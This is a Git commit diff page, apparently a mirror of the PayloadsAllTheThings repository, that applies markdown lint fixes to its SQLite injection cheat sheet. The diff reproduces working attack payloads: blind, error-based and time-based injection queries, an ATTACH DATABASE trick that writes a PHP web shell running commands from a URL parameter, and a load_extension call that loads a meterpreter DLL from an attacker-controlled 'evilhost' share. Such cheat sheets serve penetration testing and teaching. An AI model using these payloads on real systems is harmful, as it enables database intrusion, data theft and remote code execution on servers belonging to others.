gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2026-01-19 16:10:27 -08:00
Code Issues Packages Projects Releases Wiki Activity

Markdown Linting - SQL, Juggling, XSLT, XSS, Zip

Browse Source
This commit is contained in:
Swissky
2025-03-26 20:53:03 +01:00
parent bad860d79d
commit 2611dd1ba3
24 changed files with 445 additions and 646 deletions
Download Patch File Download Diff File Expand all files Collapse all files

38
SQL Injection/SQLite Injection.md
View File

@@ -1,7 +1,6 @@
# SQLite Injection
> SQLite Injection is a type of security vulnerability that occurs when an attacker can insert or "inject" malicious SQL code into SQL queries executed by an SQLite database. This vulnerability arises when user inputs are integrated into SQL statements without proper sanitization or parameterization, allowing attackers to manipulate the query logic. Such injections can lead to unauthorized data access, data manipulation, and other severe security issues.
> SQLite Injection is a type of security vulnerability that occurs when an attacker can insert or "inject" malicious SQL code into SQL queries executed by an SQLite database. This vulnerability arises when user inputs are integrated into SQL statements without proper sanitization or parameterization, allowing attackers to manipulate the query logic. Such injections can lead to unauthorized data access, data manipulation, and other severe security issues.
## Summary
@@ -17,12 +16,11 @@
* [SQlite Remote Code Execution](#sqlite-remote-code-execution)
* [Attach Database](#attach-database)
* [Load_extension](#load_extension)
* [SQLite File Manipulation](#SQLite-file-manipulation)
* [SQLite Read File](#SQLite-read-file)
* [SQLite Write File](#SQLite-write-file)
* [SQLite File Manipulation](#sqlite-file-manipulation)
* [SQLite Read File](#sqlite-read-file)
* [SQLite Write File](#sqlite-write-file)
* [References](#references)
## SQLite Comments
| Description | Comment |
@@ -30,20 +28,18 @@
| Single-Line Comment | `--` |
| Multi-Line Comment | `/**/` |
## SQLite Enumeration
| Description | SQL Query |
| ------------- | ----------------------------------------- |
| DBMS version | `select sqlite_version();` |
## SQLite String
### SQLite String Methodology
| Description | SQL Query |
| ----------------------- | ----------------------------------------- |
| ----------------------- | ----------------------------------------- |
| Extract Database Structure | `SELECT sql FROM sqlite_schema` |
| Extract Database Structure (sqlite_version > 3.33.0) | `SELECT sql FROM sqlite_master` |
| Extract Table Name | `SELECT tbl_name FROM sqlite_master WHERE type='table'` |
@@ -53,26 +49,23 @@
| Extract Column Name | `SELECT MAX(sql) FROM sqlite_master WHERE tbl_name='<TABLE_NAME>'` |
| Extract Column Name | `SELECT name FROM PRAGMA_TABLE_INFO('<TABLE_NAME>')` |
## SQLite Blind
### SQLite Blind Methodology
| Description | SQL Query |
| ----------------------- | ----------------------------------------- |
| Count Number Of Tables | `AND (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' ) < number_of_table` |
| Enumerating Table Name | `AND (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' LIMIT 1 OFFSET 0)=table_name_length_number` |
| Extract Info | `AND (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' LIMIT 1 OFFSET 0) > HEX('some_char')` |
| Extract Info (order by) | `CASE WHEN (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' LIMIT 1 OFFSET 0) = HEX('some_char') THEN <order_element_1> ELSE <order_element_2> END` |
| ----------------------- | ----------------------------------------- |
| Count Number Of Tables | `AND (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' ) < number_of_table` |
| Enumerating Table Name | `AND (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' LIMIT 1 OFFSET 0)=table_name_length_number` |
| Extract Info | `AND (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' LIMIT 1 OFFSET 0) > HEX('some_char')` |
| Extract Info (order by) | `CASE WHEN (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' LIMIT 1 OFFSET 0) = HEX('some_char') THEN <order_element_1> ELSE <order_element_2> END` |
### SQLite Blind With Substring Equivalent
| Function | Example |
| ----------- | ----------------------------------------- |
| `SUBSTRING` | `SUBSTRING('foobar', <START>, <LENGTH>)` |
| `SUBSTR` | `SUBSTR('foobar', <START>, <LENGTH>)` |
| ----------- | ----------------------------------------- |
| `SUBSTRING` | `SUBSTRING('foobar', <START>, <LENGTH>)` |
| `SUBSTR` | `SUBSTR('foobar', <START>, <LENGTH>)` |
## SQlite Error Based
@@ -80,7 +73,6 @@
AND CASE WHEN [BOOLEAN_QUERY] THEN 1 ELSE load_extension(1) END
```
## SQlite Time Based
```sql
@@ -88,7 +80,6 @@ AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
```
## SQLite Remote Code Execution
### Attach Database
@@ -107,21 +98,18 @@ INSERT INTO lol.pwn (dataz) VALUES ("<?php system($_GET['cmd']); ?>");--
UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
```
## SQLite File Manipulation
### SQLite Read File
SQLite does not support file I/O operations by default.
### SQLite Write File
```sql
SELECT writefile('/path/to/file', column_name) FROM table_name
```
## References
* [Injecting SQLite database based application - Manish Kishan Tanwar - February 14, 2017](https://www.exploit-db.com/docs/english/41397-injecting-sqlite-database-based-applications.pdf)